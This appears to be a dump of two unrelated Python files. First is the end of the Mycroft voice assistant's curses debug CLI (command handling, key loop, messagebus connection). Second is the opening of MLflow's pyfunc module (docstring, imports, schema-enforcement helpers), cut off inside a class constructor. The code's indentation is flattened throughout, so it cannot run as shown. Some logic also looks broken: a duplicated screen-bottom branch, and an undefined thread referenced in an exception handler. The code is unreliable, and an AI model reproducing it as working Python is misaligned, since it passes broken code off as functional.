scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 2:
            # Reached the bottom of the screen; start at the top and move
            # output to a new column
row = 2
column += col_width + 2
col_width = 0
if column > curses.COLS - 20:
# End of screen
break
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def show_skill_api(skill, data):
"""Show available help on Skill's API."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Skill-API for {}".format(skill),
CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 4
prepare_page()
for key in data:
color = curses.color_pair(4)
scr.addstr(row, column, "{} ({})".format(key, data[key]['type']),
CLR_HEADING)
row += 2
if 'help' in data[key]:
help_text = data[key]['help'].split('\n')
for line in help_text:
scr.addstr(row, column + 2, line, color)
row += 1
row += 2
else:
row += 1
if row == curses.LINES - 5:
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 5:
            # Reached the bottom of the screen; start at the top and move
            # output to a new column
row = 2
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def center(str_len):
# generate number of characters needed to center a string
# of the given length
return " " * ((curses.COLS - str_len) // 2)
##############################################################################
# Main UI loop
def _get_cmd_param(cmd, keyword):
    # Returns the parameter of a command, with surrounding quotes removed.
# Ex: find 'abc def' returns: abc def
# find abc def returns: abc def
if isinstance(keyword, list):
for w in keyword:
cmd = cmd.replace(w, "").strip()
else:
cmd = cmd.replace(keyword, "").strip()
if not cmd:
return None
last_char = cmd[-1]
if last_char == '"' or last_char == "'":
parts = cmd.split(last_char)
return parts[-2]
else:
parts = cmd.split(" ")
return parts[-1]
def wait_for_any_key():
"""Block until key is pressed.
This works around curses.error that can occur on old versions of ncurses.
"""
while True:
try:
scr.get_wch() # blocks
except curses.error:
# Loop if get_wch throws error
time.sleep(0.05)
else:
break
def handle_cmd(cmd):
global show_meter
global screen_mode
global log_filters
global cy_chat_area
global find_str
global show_last_key
if "show" in cmd and "log" in cmd:
pass
elif "help" in cmd:
show_help()
elif "exit" in cmd or "quit" in cmd:
return 1
elif "keycode" in cmd:
# debugging keyboard
if "hide" in cmd or "off" in cmd:
show_last_key = False
elif "show" in cmd or "on" in cmd:
show_last_key = True
elif "meter" in cmd:
# microphone level meter
if "hide" in cmd or "off" in cmd:
show_meter = False
elif "show" in cmd or "on" in cmd:
show_meter = True
elif "find" in cmd:
find_str = _get_cmd_param(cmd, "find")
rebuild_filtered_log()
elif "filter" in cmd:
if "show" in cmd or "list" in cmd:
# display active filters
add_log_message("Filters: " + str(log_filters))
return
if "reset" in cmd or "clear" in cmd:
log_filters = list(default_log_filters)
else:
# extract last word(s)
param = _get_cmd_param(cmd, "filter")
if param:
if "remove" in cmd and param in log_filters:
log_filters.remove(param)
else:
log_filters.append(param)
rebuild_filtered_log()
add_log_message("Filters: " + str(log_filters))
elif "clear" in cmd:
clear_log()
elif "log" in cmd:
# Control logging behavior in all Mycroft processes
if "level" in cmd:
level = _get_cmd_param(cmd, ["log", "level"])
bus.emit(Message("mycroft.debug.log", data={'level': level}))
elif "bus" in cmd:
state = _get_cmd_param(cmd, ["log", "bus"]).lower()
if state in ["on", "true", "yes"]:
bus.emit(Message("mycroft.debug.log", data={'bus': True}))
elif state in ["off", "false", "no"]:
bus.emit(Message("mycroft.debug.log", data={'bus': False}))
elif "history" in cmd:
# extract last word(s)
lines = int(_get_cmd_param(cmd, "history"))
if not lines or lines < 1:
lines = 1
max_chat_area = curses.LINES - 7
if lines > max_chat_area:
lines = max_chat_area
cy_chat_area = lines
elif "skills" in cmd:
        # List loaded skills
message = bus.wait_for_response(
Message('skillmanager.list'), reply_type='mycroft.skills.list')
if message:
show_skills(message.data)
wait_for_any_key()
screen_mode = SCR_MAIN
set_screen_dirty()
elif "deactivate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.deactivate", data={'skill': s}))
else:
add_log_message('Usage :deactivate SKILL [SKILL2] [...]')
elif "keep" in cmd:
s = cmd.split()
if len(s) > 1:
bus.emit(Message("skillmanager.keep", data={'skill': s[1]}))
else:
add_log_message('Usage :keep SKILL')
elif "activate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.activate", data={'skill': s}))
else:
add_log_message('Usage :activate SKILL [SKILL2] [...]')
elif "api" in cmd:
parts = cmd.split()
if len(parts) < 2:
return
skill = parts[1]
message = bus.wait_for_response(Message('{}.public_api'.format(skill)))
if message:
show_skill_api(skill, message.data)
scr.get_wch() # blocks
screen_mode = SCR_MAIN
set_screen_dirty()
# TODO: More commands
return 0 # do nothing upon return
def handle_is_connected(msg):
add_log_message("Connected to Messagebus!")
# start_qml_gui(bus, gui_text)
def handle_reconnecting():
add_log_message("Looking for Messagebus websocket...")
def gui_main(stdscr):
global scr
global bus
global line
global log_line_lr_scroll
global longest_visible_line
global find_str
global last_key
global history
global screen_lock
global show_gui
global config
scr = stdscr
init_screen()
scr.keypad(1)
scr.notimeout(True)
bus.on('speak', handle_speak)
bus.on('message', handle_message)
bus.on('recognizer_loop:utterance', handle_utterance)
bus.on('connected', handle_is_connected)
bus.on('reconnecting', handle_reconnecting)
add_log_message("Establishing Mycroft Messagebus connection...")
gui_thread = ScreenDrawThread()
gui_thread.setDaemon(True) # this thread won't prevent prog from exiting
gui_thread.start()
hist_idx = -1 # index, from the bottom
c = 0
try:
while True:
set_screen_dirty()
c = 0
code = 0
try:
if ctrl_c_pressed():
# User hit Ctrl+C. treat same as Ctrl+X
c = 24
else:
# Don't block, this allows us to refresh the screen while
# waiting on initial messagebus connection, etc
scr.timeout(1)
c = scr.get_wch() # unicode char or int for special keys
if c == -1:
continue
except curses.error:
# This happens in odd cases, such as when you Ctrl+Z
# the CLI and then resume. Curses fails on get_wch().
continue
if isinstance(c, int):
code = c
else:
code = ord(c)
# Convert VT100 ESC codes generated by some terminals
if code == 27:
# NOTE: Not sure exactly why, but the screen can get corrupted
# if we draw to the screen while doing a scr.getch(). So
# lock screen updates until the VT100 sequence has been
# completely read.
with screen_lock:
scr.timeout(0)
c1 = -1
start = time.time()
while c1 == -1:
c1 = scr.getch()
if time.time() - start > 1:
break # 1 second timeout waiting for ESC code
c2 = -1
while c2 == -1:
c2 = scr.getch()
if time.time() - start > 1: # 1 second timeout
break # 1 second timeout waiting for ESC code
if c1 == 79 and c2 == 120:
c = curses.KEY_UP
elif c1 == 79 and c2 == 116:
c = curses.KEY_LEFT
elif c1 == 79 and c2 == 114:
c = curses.KEY_DOWN
elif c1 == 79 and c2 == 118:
c = curses.KEY_RIGHT
elif c1 == 79 and c2 == 121:
c = curses.KEY_PPAGE # aka PgUp
elif c1 == 79 and c2 == 115:
c = curses.KEY_NPAGE # aka PgDn
elif c1 == 79 and c2 == 119:
c = curses.KEY_HOME
elif c1 == 79 and c2 == 113:
c = curses.KEY_END
else:
c = c1
if c1 != -1:
last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2)
code = c
else:
last_key = "ESC"
else:
                last_key = str(code)
scr.timeout(-1) # resume blocking
if code == 27: # Hitting ESC twice clears the entry line
hist_idx = -1
line = ""
elif c == curses.KEY_RESIZE:
# Generated by Curses when window/screen has been resized
y, x = scr.getmaxyx()
curses.resizeterm(y, x)
# resizeterm() causes another curses.KEY_RESIZE, so
# we need to capture that to prevent a loop of resizes
c = scr.get_wch()
elif screen_mode == SCR_HELP:
# in Help mode, any key goes to next page
show_next_help()
continue
elif c == '\n' or code == 10 or code == 13 or code == 343:
# ENTER sends the typed line to be processed by Mycroft
if line == "":
continue
if line[:1] == ":":
# Lines typed like ":help" are 'commands'
if handle_cmd(line[1:]) == 1:
break
else:
# Treat this as an utterance
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()],
'lang': config.get('lang', 'en-us')},
{'client_name': 'mycroft_cli',
'source': 'debug_cli',
'destination': ["skills"]}
))
hist_idx = -1
line = ""
elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous)
# Move up the history stack
hist_idx = clamp(hist_idx + 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next)
# Move down the history stack
hist_idx = clamp(hist_idx - 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif c == curses.KEY_LEFT:
# scroll long log lines left
log_line_lr_scroll += curses.COLS // 4
elif c == curses.KEY_RIGHT:
# scroll long log lines right
log_line_lr_scroll -= curses.COLS // 4
if log_line_lr_scroll < 0:
log_line_lr_scroll = 0
elif c == curses.KEY_HOME:
# HOME scrolls log lines all the way to the start
log_line_lr_scroll = longest_visible_line
elif c == curses.KEY_END:
# END scrolls log lines all the way to the end
log_line_lr_scroll = 0
elif c == curses.KEY_UP:
scroll_log(False, 1)
elif c == curses.KEY_DOWN:
scroll_log(True, 1)
elif c == curses.KEY_NPAGE: # aka PgDn
# PgDn to go down a page in the logs
scroll_log(True)
elif c == curses.KEY_PPAGE: # aka PgUp
# PgUp to go up a page in the logs
scroll_log(False)
elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn
scroll_log(True, max_log_lines)
elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp
scroll_log(False, max_log_lines)
elif code == curses.KEY_BACKSPACE or code == 127:
# Backspace to erase a character in the utterance
line = line[:-1]
elif code == 6: # Ctrl+F (Find)
line = ":find "
elif code == 7: # Ctrl+G (start GUI)
if show_gui is None:
start_qml_gui(bus, gui_text)
show_gui = not show_gui
elif code == 18: # Ctrl+R (Redraw)
scr.erase()
elif code == 24: # Ctrl+X (Exit)
if find_str:
# End the find session
find_str = None
rebuild_filtered_log()
elif line.startswith(":"):
# cancel command mode
line = ""
else:
# exit CLI
break
elif code > 31 and isinstance(c, str):
# Accept typed character in the utterance
line += c
finally:
scr.erase()
scr.refresh()
scr = None
def simple_cli():
global bSimple
bSimple = True
bus.on('speak', handle_speak)
try:
while True:
# Sleep for a while so all the output that results
# from the previous command finishes before we print.
time.sleep(1.5)
print("Input (Ctrl+C to quit):")
line = sys.stdin.readline()
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()]},
{'client_name': 'mycroft_simple_cli',
'source': 'debug_cli',
'destination': ["skills"]}))
except KeyboardInterrupt as e:
# User hit Ctrl+C to quit
print("")
    except Exception as e:
        LOG.exception(e)
        event_thread.exit()
        sys.exit()
def connect_to_messagebus():
""" Connect to the mycroft messagebus and launch a thread handling the
connection.
    Returns: MessageBusClient
"""
bus = MessageBusClient() # Mycroft messagebus connection
event_thread = Thread(target=connect, args=[bus])
event_thread.setDaemon(True)
event_thread.start()
return bus
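# Usage sketch (illustrative only; this mirrors how a main() entry point might
# wire things up, assuming a reachable Mycroft messagebus):
#
#     bus = connect_to_messagebus()
#     bus.on('speak', handle_speak)
#     simple_cli()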
|
__init__.py
|
"""
The ``python_function`` model flavor serves as a default model interface for MLflow Python models.
Any MLflow Python model is expected to be loadable as a ``python_function`` model.
In addition, the ``mlflow.pyfunc`` module defines a generic :ref:`filesystem format
<pyfunc-filesystem-format>` for Python models and provides utilities for saving to and loading from
this format. The format is self-contained in the sense that it includes all necessary information
for anyone to load it and use it. Dependencies are either stored directly with the model or
referenced via a Conda environment.
The ``mlflow.pyfunc`` module also defines utilities for creating custom ``pyfunc`` models
using frameworks and inference logic that may not be natively included in MLflow. See
:ref:`pyfunc-create-custom`.
.. _pyfunc-inference-api:
*************
Inference API
*************
Python function models are loaded as an instance of :py:class:`PyFuncModel
<mlflow.pyfunc.PyFuncModel>`, which is an MLflow wrapper around the model implementation and model
metadata (MLmodel file). You can score the model by calling the :py:func:`predict()
<mlflow.pyfunc.PyFuncModel.predict>` method, which has the following signature::
predict(
model_input: [pandas.DataFrame, numpy.ndarray, scipy.sparse.(csc.csc_matrix | csr.csr_matrix),
List[Any], Dict[str, Any]]
) -> [numpy.ndarray | pandas.(Series | DataFrame) | List]
All PyFunc models will support `pandas.DataFrame` as input and DL PyFunc models will also support
tensor inputs in the form of Dict[str, numpy.ndarray] (named tensors) and `numpy.ndarrays`
(unnamed tensors).
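A minimal usage sketch (the model URI below is a placeholder for a previously
saved model, not something this module provides)::

    import pandas as pd
    import mlflow.pyfunc

    model = mlflow.pyfunc.load_model("models:/example_model/1")
    predictions = model.predict(pd.DataFrame({"x": [1.0, 2.0, 3.0]}))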
.. _pyfunc-filesystem-format:
*****************
Filesystem format
*****************
The Pyfunc format is defined as a directory structure containing all required data, code, and
configuration::
./dst-path/
./MLmodel: configuration
<code>: code packaged with the model (specified in the MLmodel file)
<data>: data packaged with the model (specified in the MLmodel file)
<env>: Conda environment definition (specified in the MLmodel file)
The directory structure may contain additional contents that can be referenced by the ``MLmodel``
configuration.
.. _pyfunc-model-config:
MLModel configuration
#####################
A Python model contains an ``MLmodel`` file in **python_function** format in its root with the
following parameters:
- loader_module [required]:
Python module that can load the model. Expected as module identifier
e.g. ``mlflow.sklearn``, it will be imported using ``importlib.import_module``.
The imported module must contain a function with the following signature::
_load_pyfunc(path: string) -> <pyfunc model implementation>
The path argument is specified by the ``data`` parameter and may refer to a file or
directory. The model implementation is expected to be an object with a
``predict`` method with the following signature::
predict(
model_input: [pandas.DataFrame, numpy.ndarray,
scipy.sparse.(csc.csc_matrix | csr.csr_matrix), List[Any], Dict[str, Any]]
) -> [numpy.ndarray | pandas.(Series | DataFrame) | List]
- code [optional]:
Relative path to a directory containing the code packaged with this model.
All files and directories inside this directory are added to the Python path
prior to importing the model loader.
- data [optional]:
Relative path to a file or directory containing model data.
The path is passed to the model loader.
- env [optional]:
Relative path to an exported Conda environment. If present this environment
should be activated prior to running the model.
- Optionally, any additional parameters necessary for interpreting the serialized model in
``pyfunc`` format.
.. rubric:: Example
::
tree example/sklearn_iris/mlruns/run1/outputs/linear-lr
::
├── MLmodel
├── code
│   └── sklearn_iris.py
├── data
│ └── model.pkl
└── mlflow_env.yml
::
cat example/sklearn_iris/mlruns/run1/outputs/linear-lr/MLmodel
::
python_function:
code: code
data: data/model.pkl
loader_module: mlflow.sklearn
env: mlflow_env.yml
main: sklearn_iris
.. _pyfunc-create-custom:
******************************
Creating custom Pyfunc models
******************************
MLflow's persistence modules provide convenience functions for creating models with the
``pyfunc`` flavor in a variety of machine learning frameworks (scikit-learn, Keras, Pytorch, and
more); however, they do not cover every use case. For example, you may want to create an MLflow
model with the ``pyfunc`` flavor using a framework that MLflow does not natively support.
Alternatively, you may want to build an MLflow model that executes custom logic when evaluating
queries, such as preprocessing and postprocessing routines. Therefore, ``mlflow.pyfunc``
provides utilities for creating ``pyfunc`` models from arbitrary code and model data.
The :meth:`save_model()` and :meth:`log_model()` methods are designed to support multiple workflows
for creating custom ``pyfunc`` models that incorporate custom inference logic and artifacts
that the logic may require.
An `artifact` is a file or directory, such as a serialized model or a CSV. For example, a
serialized TensorFlow graph is an artifact. An MLflow model directory is also an artifact.
.. _pyfunc-create-custom-workflows:
Workflows
#########
:meth:`save_model()` and :meth:`log_model()` support the following workflows:
1. Programmatically defining a new MLflow model, including its attributes and artifacts.
Given a set of artifact URIs, :meth:`save_model()` and :meth:`log_model()` can
automatically download artifacts from their URIs and create an MLflow model directory.
In this case, you must define a Python class which inherits from :class:`~PythonModel`,
defining ``predict()`` and, optionally, ``load_context()``. An instance of this class is
specified via the ``python_model`` parameter; it is automatically serialized and deserialized
   as a Python class, including all of its attributes (see the first sketch after this list).
2. Interpreting pre-existing data as an MLflow model.
If you already have a directory containing model data, :meth:`save_model()` and
:meth:`log_model()` can import the data as an MLflow model. The ``data_path`` parameter
specifies the local filesystem path to the directory containing model data.
In this case, you must provide a Python module, called a `loader module`. The
loader module defines a ``_load_pyfunc()`` method that performs the following tasks:
- Load data from the specified ``data_path``. For example, this process may include
deserializing pickled Python objects or models or parsing CSV files.
- Construct and return a pyfunc-compatible model wrapper. As in the first
use case, this wrapper must define a ``predict()`` method that is used to evaluate
queries. ``predict()`` must adhere to the :ref:`pyfunc-inference-api`.
The ``loader_module`` parameter specifies the name of your loader module.
For an example loader module implementation, refer to the `loader module
implementation in mlflow.keras <https://github.com/mlflow/mlflow/blob/
74d75109aaf2975f5026104d6125bb30f4e3f744/mlflow/keras.py#L157-L187>`_.
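For illustration, here is a minimal sketch of the first workflow (``AddN`` is an
illustrative class name, not part of MLflow)::

    import mlflow.pyfunc

    class AddN(mlflow.pyfunc.PythonModel):
        def __init__(self, n):
            self.n = n

        def predict(self, context, model_input):
            return model_input.apply(lambda column: column + self.n)

    mlflow.pyfunc.save_model(path="add_n_model", python_model=AddN(n=5))

And a sketch of a loader module for the second workflow (``_ModelWrapper`` and
the pickle-based layout are assumptions for illustration; MLflow passes the
``data`` path as the ``data_path`` argument)::

    import os
    import pickle

    class _ModelWrapper:
        def __init__(self, model):
            self._model = model

        def predict(self, model_input):
            return self._model.predict(model_input)

    def _load_pyfunc(data_path):
        with open(os.path.join(data_path, "model.pkl"), "rb") as f:
            return _ModelWrapper(pickle.load(f))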
.. _pyfunc-create-custom-selecting-workflow:
Which workflow is right for my use case?
########################################
We consider the first workflow to be more user-friendly and generally recommend it for the
following reasons:
- It automatically resolves and collects specified model artifacts.
- It automatically serializes and deserializes the ``python_model`` instance and all of
  its attributes, reducing the amount of user logic that is required to load the model.
- You can create Models using logic that is defined in the ``__main__`` scope. This allows
custom models to be constructed in interactive environments, such as notebooks and the Python
REPL.
You may prefer the second, lower-level workflow for the following reasons:
- Inference logic is always persisted as code, rather than a Python object. This makes logic
easier to inspect and modify later.
- If you have already collected all of your model data in a single location, the second
workflow allows it to be saved in MLflow format directly, without enumerating constituent
artifacts.
"""
import importlib
import tempfile
import signal
import sys
import numpy as np
import os
import pandas
import yaml
from copy import deepcopy
import logging
import threading
import collections
import subprocess
from typing import Any, Union, List, Dict, Iterator, Tuple
import mlflow
import mlflow.pyfunc.model
from mlflow.models import Model, ModelSignature, ModelInputExample
from mlflow.models.model import MLMODEL_FILE_NAME
from mlflow.models.utils import _save_example
from mlflow.pyfunc.model import ( # pylint: disable=unused-import
PythonModel,
PythonModelContext,
get_default_conda_env,
)
from mlflow.pyfunc.model import get_default_pip_requirements
from mlflow.tracking.artifact_utils import _download_artifact_from_uri
from mlflow.types import DataType, Schema, TensorSpec
from mlflow.types.utils import clean_tensor_type
from mlflow.utils import PYTHON_VERSION, get_major_minor_py_version
from mlflow.utils.annotations import deprecated
from mlflow.utils.file_utils import _copy_file_or_tree, write_to
from mlflow.utils.model_utils import (
_get_flavor_configuration,
_validate_and_copy_code_paths,
_add_code_from_conf_to_system_path,
_get_flavor_configuration_from_uri,
_validate_and_prepare_target_save_path,
)
from mlflow.utils.uri import append_to_uri_path
from mlflow.utils.environment import (
_EnvManager,
_validate_env_arguments,
_process_pip_requirements,
_process_conda_env,
_CONDA_ENV_FILE_NAME,
_REQUIREMENTS_FILE_NAME,
_CONSTRAINTS_FILE_NAME,
)
from mlflow.utils.docstring_utils import format_docstring, LOG_MODEL_PARAM_DOCS
from mlflow.utils.databricks_utils import is_in_databricks_runtime
from mlflow.exceptions import MlflowException
from mlflow.tracking._model_registry import DEFAULT_AWAIT_MAX_SLEEP_SECONDS
from mlflow.protos.databricks_pb2 import (
INVALID_PARAMETER_VALUE,
RESOURCE_DOES_NOT_EXIST,
)
from scipy.sparse import csc_matrix, csr_matrix
from mlflow.utils.requirements_utils import (
_check_requirement_satisfied,
_parse_requirements,
)
from mlflow.utils import find_free_port
from mlflow.utils.nfs_on_spark import get_nfs_cache_root_dir
FLAVOR_NAME = "python_function"
MAIN = "loader_module"
CODE = "code"
DATA = "data"
ENV = "env"
PY_VERSION = "python_version"
_logger = logging.getLogger(__name__)
PyFuncInput = Union[pandas.DataFrame, np.ndarray, csc_matrix, csr_matrix, List[Any], Dict[str, Any]]
PyFuncOutput = Union[pandas.DataFrame, pandas.Series, np.ndarray, list]
def add_to_model(model, loader_module, data=None, code=None, env=None, **kwargs):
"""
Add a ``pyfunc`` spec to the model configuration.
Defines ``pyfunc`` configuration schema. Caller can use this to create a valid ``pyfunc`` model
flavor out of an existing directory structure. For example, other model flavors can use this to
specify how to use their output as a ``pyfunc``.
NOTE:
All paths are relative to the exported model root directory.
:param model: Existing model.
:param loader_module: The module to be used to load the model.
:param data: Path to the model data.
:param code: Path to the code dependencies.
:param env: Conda environment.
:param kwargs: Additional key-value pairs to include in the ``pyfunc`` flavor specification.
Values must be YAML-serializable.
:return: Updated model configuration.
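
    .. code-block:: python
        :caption: Example

        # A minimal sketch of how another flavor might use this helper;
        # "my_flavor.loader" is an illustrative module name.
        from mlflow.models import Model

        model_conf = Model()
        add_to_model(model_conf, loader_module="my_flavor.loader", data="model.pkl")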
"""
params = deepcopy(kwargs)
params[MAIN] = loader_module
params[PY_VERSION] = PYTHON_VERSION
if code:
params[CODE] = code
if data:
params[DATA] = data
if env:
params[ENV] = env
return model.add_flavor(FLAVOR_NAME, **params)
def _load_model_env(path):
"""
Get ENV file string from a model configuration stored in Python Function format.
Returned value is a model-relative path to a Conda Environment file,
or None if none was specified at model save time
"""
return _get_flavor_configuration(model_path=path, flavor_name=FLAVOR_NAME).get(ENV, None)
def _enforce_mlflow_datatype(name, values: pandas.Series, t: DataType):
"""
Enforce the input column type matches the declared in model input schema.
The following type conversions are allowed:
1. object -> string
2. int -> long (upcast)
3. float -> double (upcast)
4. int -> double (safe conversion)
5. np.datetime64[x] -> datetime (any precision)
6. object -> datetime
Any other type mismatch will raise error.
"""
if values.dtype == object and t not in (DataType.binary, DataType.string):
values = values.infer_objects()
if t == DataType.string and values.dtype == object:
# NB: the object can contain any type and we currently cannot cast to pandas Strings
# due to how None is cast
return values
# NB: Comparison of pandas and numpy data type fails when numpy data type is on the left hand
# side of the comparison operator. It works, however, if pandas type is on the left hand side.
# That is because pandas is aware of numpy.
if t.to_pandas() == values.dtype or t.to_numpy() == values.dtype:
# The types are already compatible => conversion is not necessary.
return values
    if t == DataType.binary and values.dtype.kind == t.to_numpy().kind:
# NB: bytes in numpy have variable itemsize depending on the length of the longest
# element in the array (column). Since MLflow binary type is length agnostic, we ignore
# itemsize when matching binary columns.
return values
if t == DataType.datetime and values.dtype.kind == t.to_numpy().kind:
# NB: datetime values have variable precision denoted by brackets, e.g. datetime64[ns]
# denotes nanosecond precision. Since MLflow datetime type is precision agnostic, we
# ignore precision when matching datetime columns.
return values
if t == DataType.datetime and values.dtype == object:
# NB: Pyspark date columns get converted to object when converted to a pandas
# DataFrame. To respect the original typing, we convert the column to datetime.
try:
return values.astype(np.datetime64, errors="raise")
except ValueError:
raise MlflowException(
"Failed to convert column {0} from type {1} to {2}.".format(name, values.dtype, t)
)
numpy_type = t.to_numpy()
if values.dtype.kind == numpy_type.kind:
is_upcast = values.dtype.itemsize <= numpy_type.itemsize
elif values.dtype.kind == "u" and numpy_type.kind == "i":
is_upcast = values.dtype.itemsize < numpy_type.itemsize
elif values.dtype.kind in ("i", "u") and numpy_type == np.float64:
# allow (u)int => double conversion
is_upcast = values.dtype.itemsize <= 6
else:
is_upcast = False
if is_upcast:
return values.astype(numpy_type, errors="raise")
else:
# NB: conversion between incompatible types (e.g. floats -> ints or
# double -> float) are not allowed. While supported by pandas and numpy,
# these conversions alter the values significantly.
def all_ints(xs):
return all([pandas.isnull(x) or int(x) == x for x in xs])
hint = ""
if (
values.dtype == np.float64
and numpy_type.kind in ("i", "u")
and values.hasnans
and all_ints(values)
):
hint = (
" Hint: the type mismatch is likely caused by missing values. "
"Integer columns in python can not represent missing values and are therefore "
"encoded as floats. The best way to avoid this problem is to infer the model "
"schema based on a realistic data sample (training dataset) that includes missing "
"values. Alternatively, you can declare integer columns as doubles (float64) "
"whenever these columns may have missing values. See `Handling Integers With "
"Missing Values <https://www.mlflow.org/docs/latest/models.html#"
"handling-integers-with-missing-values>`_ for more details."
)
raise MlflowException(
"Incompatible input types for column {0}. "
"Can not safely convert {1} to {2}.{3}".format(name, values.dtype, numpy_type, hint)
)
def _enforce_tensor_spec(
values: Union[np.ndarray, csc_matrix, csr_matrix], tensor_spec: TensorSpec
):
"""
Enforce the input tensor shape and type matches the provided tensor spec.
"""
expected_shape = tensor_spec.shape
actual_shape = values.shape
actual_type = values.dtype if isinstance(values, np.ndarray) else values.data.dtype
if len(expected_shape) != len(actual_shape):
raise MlflowException(
"Shape of input {0} does not match expected shape {1}.".format(
actual_shape, expected_shape
)
)
for expected, actual in zip(expected_shape, actual_shape):
if expected == -1:
continue
if expected != actual:
raise MlflowException(
"Shape of input {0} does not match expected shape {1}.".format(
actual_shape, expected_shape
)
)
if clean_tensor_type(actual_type) != tensor_spec.type:
raise MlflowException(
"dtype of input {0} does not match expected dtype {1}".format(
values.dtype, tensor_spec.type
)
)
return values
def _enforce_col_schema(pfInput: PyFuncInput, input_schema: Schema):
"""Enforce the input columns conform to the model's column-based signature."""
if input_schema.has_input_names():
input_names = input_schema.input_names()
else:
input_names = pfInput.columns[: len(input_schema.inputs)]
input_types = input_schema.input_types()
new_pfInput = pandas.DataFrame()
for i, x in enumerate(input_names):
new_pfInput[x] = _enforce_mlflow_datatype(x, pfInput[x], input_types[i])
return new_pfInput
def _enforce_tensor_schema(pfInput: PyFuncInput, input_schema: Schema):
"""Enforce the input tensor(s) conforms to the model's tensor-based signature."""
if input_schema.has_input_names():
if isinstance(pfInput, dict):
new_pfInput = dict()
for col_name, tensor_spec in zip(input_schema.input_names(), input_schema.inputs):
if not isinstance(pfInput[col_name], np.ndarray):
raise MlflowException(
"This model contains a tensor-based model signature with input names,"
" which suggests a dictionary input mapping input name to a numpy"
" array, but a dict with value type {0} was found.".format(
type(pfInput[col_name])
)
)
new_pfInput[col_name] = _enforce_tensor_spec(pfInput[col_name], tensor_spec)
elif isinstance(pfInput, pandas.DataFrame):
new_pfInput = dict()
for col_name, tensor_spec in zip(input_schema.input_names(), input_schema.inputs):
new_pfInput[col_name] = _enforce_tensor_spec(
np.array(pfInput[col_name], dtype=tensor_spec.type), tensor_spec
)
else:
raise MlflowException(
"This model contains a tensor-based model signature with input names, which"
" suggests a dictionary input mapping input name to tensor, but an input of"
" type {0} was found.".format(type(pfInput))
)
else:
if isinstance(pfInput, pandas.DataFrame):
new_pfInput = _enforce_tensor_spec(pfInput.to_numpy(), input_schema.inputs[0])
elif isinstance(pfInput, (np.ndarray, csc_matrix, csr_matrix)):
new_pfInput = _enforce_tensor_spec(pfInput, input_schema.inputs[0])
else:
raise MlflowException(
"This model contains a tensor-based model signature with no input names,"
" which suggests a numpy array input, but an input of type {0} was"
" found.".format(type(pfInput))
)
return new_pfInput
def _enforce_schema(pfInput: PyFuncInput, input_schema: Schema):
"""
Enforces the provided input matches the model's input schema,
For signatures with input names, we check there are no missing inputs and reorder the inputs to
match the ordering declared in schema if necessary. Any extra columns are ignored.
For column-based signatures, we make sure the types of the input match the type specified in
the schema or if it can be safely converted to match the input schema.
For tensor-based signatures, we make sure the shape and type of the input matches the shape
and type specified in model's input schema.
"""
if not input_schema.is_tensor_spec():
if isinstance(pfInput, (list, np.ndarray, dict)):
try:
pfInput = pandas.DataFrame(pfInput)
except Exception as e:
raise MlflowException(
"This model contains a column-based signature, which suggests a DataFrame"
" input. There was an error casting the input data to a DataFrame:"
" {0}".format(str(e))
)
if not isinstance(pfInput, pandas.DataFrame):
raise MlflowException(
"Expected input to be DataFrame or list. Found: %s" % type(pfInput).__name__
)
if input_schema.has_input_names():
# make sure there are no missing columns
input_names = input_schema.input_names()
expected_cols = set(input_names)
actual_cols = set()
if len(expected_cols) == 1 and isinstance(pfInput, np.ndarray):
# for schemas with a single column, match input with column
pfInput = {input_names[0]: pfInput}
actual_cols = expected_cols
elif isinstance(pfInput, pandas.DataFrame):
actual_cols = set(pfInput.columns)
elif isinstance(pfInput, dict):
actual_cols = set(pfInput.keys())
missing_cols = expected_cols - actual_cols
extra_cols = actual_cols - expected_cols
# Preserve order from the original columns, since missing/extra columns are likely to
# be in same order.
missing_cols = [c for c in input_names if c in missing_cols]
extra_cols = [c for c in actual_cols if c in extra_cols]
if missing_cols:
raise MlflowException(
"Model is missing inputs {0}."
" Note that there were extra inputs: {1}".format(missing_cols, extra_cols)
)
elif not input_schema.is_tensor_spec():
# The model signature does not specify column names => we can only verify column count.
num_actual_columns = len(pfInput.columns)
if num_actual_columns < len(input_schema.inputs):
raise MlflowException(
"Model inference is missing inputs. The model signature declares "
"{0} inputs but the provided value only has "
"{1} inputs. Note: the inputs were not named in the signature so we can "
"only verify their count.".format(len(input_schema.inputs), num_actual_columns)
)
return (
_enforce_tensor_schema(pfInput, input_schema)
if input_schema.is_tensor_spec()
else _enforce_col_schema(pfInput, input_schema)
)
class PyFuncModel:
"""
MLflow 'python function' model.
Wrapper around model implementation and metadata. This class is not meant to be constructed
directly. Instead, instances of this class are constructed and returned from
:py:func:`load_model() <mlflow.pyfunc.load_model>`.
``model_impl`` can be any Python object that implements the `Pyfunc interface
<https://mlflow.org/docs/latest/python_api/mlflow.pyfunc.html#pyfunc-inference-api>`_, and is
returned by invoking the model's ``loader_module``.
``model_meta`` contains model metadata loaded from the MLmodel file.
"""
def __init__(self, model_meta: Model, model_impl: Any):
if not hasattr(model_impl, "predict"):
raise MlflowException("Model implementation is missing required predict method.")
